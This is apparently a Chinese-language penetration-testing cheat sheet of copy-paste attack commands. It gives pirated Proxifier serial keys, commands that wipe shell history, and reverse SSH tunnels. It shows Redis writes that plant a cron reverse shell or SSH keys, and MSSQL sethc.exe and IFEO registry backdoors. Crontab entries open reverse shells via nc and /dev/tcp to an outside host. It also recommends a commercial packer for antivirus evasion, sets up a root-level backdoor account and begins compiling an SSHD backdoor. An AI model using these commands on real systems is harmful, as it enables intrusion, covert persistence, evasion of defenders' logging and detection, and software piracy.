Awesome

pentest

一顿复制粘贴，毫无技术含量

工具集

proxifier

下载地址 http://www.proxifier.com/download/

序列号
L6Z8A-XY2J4-BTZ3P-ZZ7DF-A2Q9C（Portable Edition）
5EZ8G-C3WL5-B56YG-SCXM9-6QZAP（Standard Edition）
P427L-9Y552-5433E-8DSR3-58Z68（MAC）

proxychains-ng

• https://github.com/rofl0r/proxychains-ng
• https://github.com/sensepost/reGeorg

# 用Mac的优势!!!    
brew install proxychains-ng

高频命令

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
python -c 'import pty; pty.spawn("/bin/sh")'
ssh -C -f -N -g -R 3389:10.0.0.1:3389 gg@118.118.118.118

plink.exe -C -N -R 3389:127.0.0.1:3389 gg@118.118.118.118 -pw 123456 -P 443

set 0 "\n\n\n* * * * * bash -i >& /dev/tcp/118.118.118.118/53 0>&1\n\n\n"
config set dir /var/spool/cron
config set dbfilename root
save
config set dir /var/lib/redis
config set dbfilename dump.rdb

cat foo.txt | redis-cli -h 10.10.10.10 -x set 0
config set dir /root/.ssh
config set dbfilename "authorized_keys"

简单操作

# MSSQL 替换系统文件
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\cmd.exe','c:\windows\system32\sethc.exe';

# IFEO劫持
EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='c:\windows\system32\cmd.exe'

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

操作ES查询数据

查看索引
http://10.10.10.10:9200/_cat/indices

搜索数据
http://10.10.10.10:9200/hello/_search?pretty&size=50&from=50

短期内持久化

(crontab -l;echo '*/60 * * * * rm /tmp/yum.log;mkfifo /tmp/yum.log;cat /tmp/yum.log|/bin/sh -i 2>&1|/usr/bin/nc  -w 3 118.118.118.118 53 >/tmp/yum.log')|crontab -
(crontab -l;echo '*/5 * * * * rm /tmp/yum.log;mkfifo /tmp/yum.log;cat /tmp/yum.log|/bin/sh -i 2>&1|/usr/bin/nc 118.118.118.118 53 >/tmp/yum.log')|crontab -

(crontab -l;echo '*/1 * * * * exec 9<> /dev/tcp/118.118.118.118/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -

买个最新的壳快速免杀

支持微信支付，萌萌哒
https://vmpsoft.com/purchase/buy-online/

已有用户加个密码复用

# 替换用户shell    
usermod -s /bin/bash ntp
usermod -g root ntp # 给予root权限
passwd ntp # 加个密码，改个/etc/passwd id = 0

编译SSHD后门

./configure --sysconfdir=/etc/ssh --bindir=/usr/bin --sbindir=/usr/sbin --prefix=/usr --with-pam --with-tcp-wrappers --with-kerberos5 --without-zlib-version-check --without-openssl-header-check